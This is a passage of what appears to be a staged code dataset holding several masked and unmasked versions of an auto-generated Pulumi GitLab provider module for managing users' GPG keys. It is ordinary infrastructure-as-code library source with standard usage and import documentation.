__self__._internal_init(resource_name, opts, **resource_args.\n __dict__)\n else:\n __self__._internal_init(resource_name, *args, **kwargs)\n\n def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.\n ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,\n user_id: Optional[pulumi.Input[int]]=None, __props__=None):\n opts = pulumi.ResourceOptions.merge(_utilities.\n get_resource_opts_defaults(), opts)\n if not isinstance(opts, pulumi.ResourceOptions):\n raise TypeError(\n 'Expected resource options to be a ResourceOptions instance')\n if opts.id is None:\n if __props__ is not None:\n raise TypeError(\n '__props__ is only valid when passed in combination with a valid opts.id to get an existing resource'\n )\n __props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)\n if key is None and not opts.urn:\n raise TypeError(\"Missing required property 'key'\")\n __props__.__dict__['key'] = key\n __props__.__dict__['user_id'] = user_id\n __props__.__dict__['created_at'] = None\n __props__.__dict__['key_id'] = None\n super(UserGpgKey, __self__).__init__(\n 'gitlab:index/userGpgKey:UserGpgKey', resource_name, __props__,\n opts)\n\n @staticmethod\n def get(resource_name: str, id: pulumi.Input[str], opts: Optional[\n pulumi.ResourceOptions]=None, created_at: Optional[pulumi.Input[str\n ]]=None, key: Optional[pulumi.Input[str]]=None, key_id: Optional[\n pulumi.Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None\n ) ->'UserGpgKey':\n \"\"\"\n Get an existing UserGpgKey resource's state with the given name, id, and optional extra\n properties used to qualify the lookup.\n\n :param str resource_name: The unique name of the resulting resource.\n :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)\n )\n __props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)\n __props__.__dict__['created_at'] = created_at\n __props__.__dict__['key'] = key\n __props__.__dict__['key_id'] = key_id\n __props__.__dict__['user_id'] = user_id\n return UserGpgKey(resource_name, opts=opts, __props__=__props__)\n\n @property\n @pulumi.getter(name='createdAt')\n def created_at(self) ->pulumi.Output[str]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, 'created_at')\n\n @property\n @pulumi.getter\n def key(self) ->pulumi.Output[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n\n @property\n @pulumi.getter(name='keyId')\n def key_id(self) ->pulumi.Output[int]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, 'key_id')\n\n @property\n @pulumi.getter(name='userId')\n def user_id(self) ->pulumi.Output[Optional[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, 'user_id')\n",
"step-2": "<mask token>\n\n\[email protected]_type\nclass _UserGpgKeyState:\n\n def __init__(__self__, *, created_at: Optional[pulumi.Input[str]]=None,\n key: Optional[pulumi.Input[str]]=None, key_id: Optional[pulumi.\n Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None):\n \"\"\"\n Input properties used for looking up and filtering UserGpgKey resources.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n if created_at is not None:\n pulumi.set(__self__, 'created_at', created_at)\n if key is not None:\n pulumi.set(__self__, 'key', key)\n if key_id is not None:\n pulumi.set(__self__, 'key_id', key_id)\n if user_id is not None:\n pulumi.set(__self__, 'user_id', user_id)\n\n @property\n @pulumi.getter(name='createdAt')\n def created_at(self) ->Optional[pulumi.Input[str]]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, 'created_at')\n\n @created_at.setter\n def created_at(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, 'created_at', value)\n\n @property\n @pulumi.getter\n def key(self) ->Optional[pulumi.Input[str]]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n\n @key.setter\n def key(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, 'key', value)\n\n @property\n @pulumi.getter(name='keyId')\n def key_id(self) ->Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, 'key_id')\n <mask token>\n\n @property\n @pulumi.getter(name='userId')\n def user_id(self) ->Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, 'user_id')\n\n @user_id.setter\n def user_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, 'user_id', value)\n\n\nclass UserGpgKey(pulumi.CustomResource):\n\n @overload\n def __init__(__self__, resource_name: str, opts: Optional[pulumi.\n ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,\n user_id: Optional[pulumi.Input[int]]=None, __props__=None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n ...\n\n @overload\n def __init__(__self__, resource_name: str, args: UserGpgKeyArgs, opts:\n Optional[pulumi.ResourceOptions]=None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.\n :param pulumi.ResourceOptions opts: Options for the resource.\n \"\"\"\n ...\n\n def __init__(__self__, resource_name: str, *args, **kwargs):\n resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs,\n pulumi.ResourceOptions, *args, **kwargs)\n if resource_args is not None:\n __self__._internal_init(resource_name, opts, **resource_args.\n __dict__)\n else:\n __self__._internal_init(resource_name, *args, **kwargs)\n\n def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.\n ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,\n user_id: Optional[pulumi.Input[int]]=None, __props__=None):\n opts = pulumi.ResourceOptions.merge(_utilities.\n get_resource_opts_defaults(), opts)\n if not isinstance(opts, pulumi.ResourceOptions):\n raise TypeError(\n 'Expected resource options to be a ResourceOptions instance')\n if opts.id is None:\n if __props__ is not None:\n raise TypeError(\n '__props__ is only valid when passed in combination with a valid opts.id to get an existing resource'\n )\n __props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)\n if key is None and not opts.urn:\n raise TypeError(\"Missing required property 'key'\")\n __props__.__dict__['key'] = key\n __props__.__dict__['user_id'] = user_id\n __props__.__dict__['created_at'] = None\n __props__.__dict__['key_id'] = None\n super(UserGpgKey, __self__).__init__(\n 'gitlab:index/userGpgKey:UserGpgKey', resource_name, __props__,\n opts)\n\n @staticmethod\n def get(resource_name: str, id: pulumi.Input[str], opts: Optional[\n pulumi.ResourceOptions]=None, created_at: Optional[pulumi.Input[str\n ]]=None, key: Optional[pulumi.Input[str]]=None, key_id: Optional[\n pulumi.Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None\n ) ->'UserGpgKey':\n \"\"\"\n Get an existing UserGpgKey resource's state with the given name, id, and optional extra\n properties used to qualify the lookup.\n\n :param str resource_name: The unique name of the resulting resource.\n :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)\n )\n __props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)\n __props__.__dict__['created_at'] = created_at\n __props__.__dict__['key'] = key\n __props__.__dict__['key_id'] = key_id\n __props__.__dict__['user_id'] = user_id\n return UserGpgKey(resource_name, opts=opts, __props__=__props__)\n\n @property\n @pulumi.getter(name='createdAt')\n def created_at(self) ->pulumi.Output[str]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, 'created_at')\n\n @property\n @pulumi.getter\n def key(self) ->pulumi.Output[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n\n @property\n @pulumi.getter(name='keyId')\n def key_id(self) ->pulumi.Output[int]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, 'key_id')\n\n @property\n @pulumi.getter(name='userId')\n def user_id(self) ->pulumi.Output[Optional[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, 'user_id')\n",
"step-3": "<mask token>\n\n\[email protected]_type\nclass UserGpgKeyArgs:\n <mask token>\n\n @property\n @pulumi.getter\n def key(self) ->pulumi.Input[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n <mask token>\n <mask token>\n <mask token>\n\n\[email protected]_type\nclass _UserGpgKeyState:\n\n def __init__(__self__, *, created_at: Optional[pulumi.Input[str]]=None,\n key: Optional[pulumi.Input[str]]=None, key_id: Optional[pulumi.\n Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None):\n \"\"\"\n Input properties used for looking up and filtering UserGpgKey resources.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n if created_at is not None:\n pulumi.set(__self__, 'created_at', created_at)\n if key is not None:\n pulumi.set(__self__, 'key', key)\n if key_id is not None:\n pulumi.set(__self__, 'key_id', key_id)\n if user_id is not None:\n pulumi.set(__self__, 'user_id', user_id)\n\n @property\n @pulumi.getter(name='createdAt')\n def created_at(self) ->Optional[pulumi.Input[str]]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, 'created_at')\n\n @created_at.setter\n def created_at(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, 'created_at', value)\n\n @property\n @pulumi.getter\n def key(self) ->Optional[pulumi.Input[str]]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n\n @key.setter\n def key(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, 'key', value)\n\n @property\n @pulumi.getter(name='keyId')\n def key_id(self) ->Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, 'key_id')\n\n @key_id.setter\n def key_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, 'key_id', value)\n\n @property\n @pulumi.getter(name='userId')\n def user_id(self) ->Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, 'user_id')\n\n @user_id.setter\n def user_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, 'user_id', value)\n\n\nclass UserGpgKey(pulumi.CustomResource):\n\n @overload\n def __init__(__self__, resource_name: str, opts: Optional[pulumi.\n ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,\n user_id: Optional[pulumi.Input[int]]=None, __props__=None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n ...\n\n @overload\n def __init__(__self__, resource_name: str, args: UserGpgKeyArgs, opts:\n Optional[pulumi.ResourceOptions]=None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.\n :param pulumi.ResourceOptions opts: Options for the resource.\n \"\"\"\n ...\n\n def __init__(__self__, resource_name: str, *args, **kwargs):\n resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs,\n pulumi.ResourceOptions, *args, **kwargs)\n if resource_args is not None:\n __self__._internal_init(resource_name, opts, **resource_args.\n __dict__)\n else:\n __self__._internal_init(resource_name, *args, **kwargs)\n\n def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.\n ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,\n user_id: Optional[pulumi.Input[int]]=None, __props__=None):\n opts = pulumi.ResourceOptions.merge(_utilities.\n get_resource_opts_defaults(), opts)\n if not isinstance(opts, pulumi.ResourceOptions):\n raise TypeError(\n 'Expected resource options to be a ResourceOptions instance')\n if opts.id is None:\n if __props__ is not None:\n raise TypeError(\n '__props__ is only valid when passed in combination with a valid opts.id to get an existing resource'\n )\n __props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)\n if key is None and not opts.urn:\n raise TypeError(\"Missing required property 'key'\")\n __props__.__dict__['key'] = key\n __props__.__dict__['user_id'] = user_id\n __props__.__dict__['created_at'] = None\n __props__.__dict__['key_id'] = None\n super(UserGpgKey, __self__).__init__(\n 'gitlab:index/userGpgKey:UserGpgKey', resource_name, __props__,\n opts)\n\n @staticmethod\n def get(resource_name: str, id: pulumi.Input[str], opts: Optional[\n pulumi.ResourceOptions]=None, created_at: Optional[pulumi.Input[str\n ]]=None, key: Optional[pulumi.Input[str]]=None, key_id: Optional[\n pulumi.Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None\n ) ->'UserGpgKey':\n \"\"\"\n Get an existing UserGpgKey resource's state with the given name, id, and optional extra\n properties used to qualify the lookup.\n\n :param str resource_name: The unique name of the resulting resource.\n :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id)\n )\n __props__ = _UserGpgKeyState.__new__(_UserGpgKeyState)\n __props__.__dict__['created_at'] = created_at\n __props__.__dict__['key'] = key\n __props__.__dict__['key_id'] = key_id\n __props__.__dict__['user_id'] = user_id\n return UserGpgKey(resource_name, opts=opts, __props__=__props__)\n\n @property\n @pulumi.getter(name='createdAt')\n def created_at(self) ->pulumi.Output[str]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, 'created_at')\n\n @property\n @pulumi.getter\n def key(self) ->pulumi.Output[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n\n @property\n @pulumi.getter(name='keyId')\n def key_id(self) ->pulumi.Output[int]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, 'key_id')\n\n @property\n @pulumi.getter(name='userId')\n def user_id(self) ->pulumi.Output[Optional[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, 'user_id')\n",
"step-4": "<mask token>\n\n\[email protected]_type\nclass UserGpgKeyArgs:\n\n def __init__(__self__, *, key: pulumi.Input[str], user_id: Optional[\n pulumi.Input[int]]=None):\n \"\"\"\n The set of arguments for constructing a UserGpgKey resource.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n pulumi.set(__self__, 'key', key)\n if user_id is not None:\n pulumi.set(__self__, 'user_id', user_id)\n\n @property\n @pulumi.getter\n def key(self) ->pulumi.Input[str]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n\n @key.setter\n def key(self, value: pulumi.Input[str]):\n pulumi.set(self, 'key', value)\n\n @property\n @pulumi.getter(name='userId')\n def user_id(self) ->Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, 'user_id')\n\n @user_id.setter\n def user_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, 'user_id', value)\n\n\[email protected]_type\nclass _UserGpgKeyState:\n\n def __init__(__self__, *, created_at: Optional[pulumi.Input[str]]=None,\n key: Optional[pulumi.Input[str]]=None, key_id: Optional[pulumi.\n Input[int]]=None, user_id: Optional[pulumi.Input[int]]=None):\n \"\"\"\n Input properties used for looking up and filtering UserGpgKey resources.\n :param pulumi.Input[str] created_at: The time when this key was created in GitLab.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] key_id: The ID of the GPG key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n if created_at is not None:\n pulumi.set(__self__, 'created_at', created_at)\n if key is not None:\n pulumi.set(__self__, 'key', key)\n if key_id is not None:\n pulumi.set(__self__, 'key_id', key_id)\n if user_id is not None:\n pulumi.set(__self__, 'user_id', user_id)\n\n @property\n @pulumi.getter(name='createdAt')\n def created_at(self) ->Optional[pulumi.Input[str]]:\n \"\"\"\n The time when this key was created in GitLab.\n \"\"\"\n return pulumi.get(self, 'created_at')\n\n @created_at.setter\n def created_at(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, 'created_at', value)\n\n @property\n @pulumi.getter\n def key(self) ->Optional[pulumi.Input[str]]:\n \"\"\"\n The armored GPG public key.\n \"\"\"\n return pulumi.get(self, 'key')\n\n @key.setter\n def key(self, value: Optional[pulumi.Input[str]]):\n pulumi.set(self, 'key', value)\n\n @property\n @pulumi.getter(name='keyId')\n def key_id(self) ->Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the GPG key.\n \"\"\"\n return pulumi.get(self, 'key_id')\n\n @key_id.setter\n def key_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, 'key_id', value)\n\n @property\n @pulumi.getter(name='userId')\n def user_id(self) ->Optional[pulumi.Input[int]]:\n \"\"\"\n The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n return pulumi.get(self, 'user_id')\n\n @user_id.setter\n def user_id(self, value: Optional[pulumi.Input[int]]):\n pulumi.set(self, 'user_id', value)\n\n\nclass UserGpgKey(pulumi.CustomResource):\n\n @overload\n def __init__(__self__, resource_name: str, opts: Optional[pulumi.\n ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,\n user_id: Optional[pulumi.Input[int]]=None, __props__=None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param pulumi.ResourceOptions opts: Options for the resource.\n :param pulumi.Input[str] key: The armored GPG public key.\n :param pulumi.Input[int] user_id: The ID of the user to add the GPG key to. If this field is omitted, this resource manages a GPG key for the current user. Otherwise, this resource manages a GPG key for the specified user, and an admin token is required.\n \"\"\"\n ...\n\n @overload\n def __init__(__self__, resource_name: str, args: UserGpgKeyArgs, opts:\n Optional[pulumi.ResourceOptions]=None):\n \"\"\"\n The `UserGpgKey` resource allows to manage the lifecycle of a GPG key assigned to the current user or a specific user.\n\n > Managing GPG keys for arbitrary users requires admin privileges.\n\n **Upstream API**: [GitLab REST API docs](https://docs.gitlab.com/ee/api/users.html#get-a-specific-gpg-key)\n\n ## Example Usage\n\n ```python\n import pulumi\n import pulumi_gitlab as gitlab\n\n example_user = gitlab.get_user(username=\"example-user\")\n # Manages a GPG key for the specified user. An admin token is required if `user_id` is specified.\n example_user_gpg_key = gitlab.UserGpgKey(\"exampleUserGpgKey\",\n user_id=example_user.id,\n key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n # Manages a GPG key for the current user\n example_user_user_gpg_key = gitlab.UserGpgKey(\"exampleUserUserGpgKey\", key=\"\"\\\"-----BEGIN PGP PUBLIC KEY BLOCK-----\n ...\n -----END PGP PUBLIC KEY BLOCK-----\"\"\\\")\n ```\n\n ## Import\n\n You can import a GPG key for a specific user using an id made up of `{user-id}:{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example 42:1\n ```\n\n Alternatively, you can import a GPG key for the current user using an id made up of `{key}`, e.g.\n\n ```sh\n $ pulumi import gitlab:index/userGpgKey:UserGpgKey example_user 1\n ```\n\n :param str resource_name: The name of the resource.\n :param UserGpgKeyArgs args: The arguments to use to populate this resource's properties.\n :param pulumi.ResourceOptions opts: Options for the resource.\n \"\"\"\n ...\n\n def __init__(__self__, resource_name: str, *args, **kwargs):\n resource_args, opts = _utilities.get_resource_args_opts(UserGpgKeyArgs,\n pulumi.ResourceOptions, *args, **kwargs)\n if resource_args is not None:\n __self__._internal_init(resource_name, opts, **resource_args.\n __dict__)\n else:\n __self__._internal_init(resource_name, *args, **kwargs)\n\n def _internal_init(__self__, resource_name: str, opts: Optional[pulumi.\n ResourceOptions]=None, key: Optional[pulumi.Input[str]]=None,\n user_id: Optional[pulumi.Input[int]]=None, __props__=None):\n opts = pulumi.ResourceOptions.merge(_utilities.\n get_resource_opts_defaults(), opts)\n if not isinstance(opts, pulumi.ResourceOptions):\n raise TypeError(\n 'Expected resource options to be a ResourceOptions instance')\n if opts.id is None:\n if __props__ is not None:\n raise TypeError(\n '__props__ is only valid when passed in combination with a valid opts.id to get an existing resource'\n )\n __props__ = UserGpgKeyArgs.__new__(UserGpgKeyArgs)\n 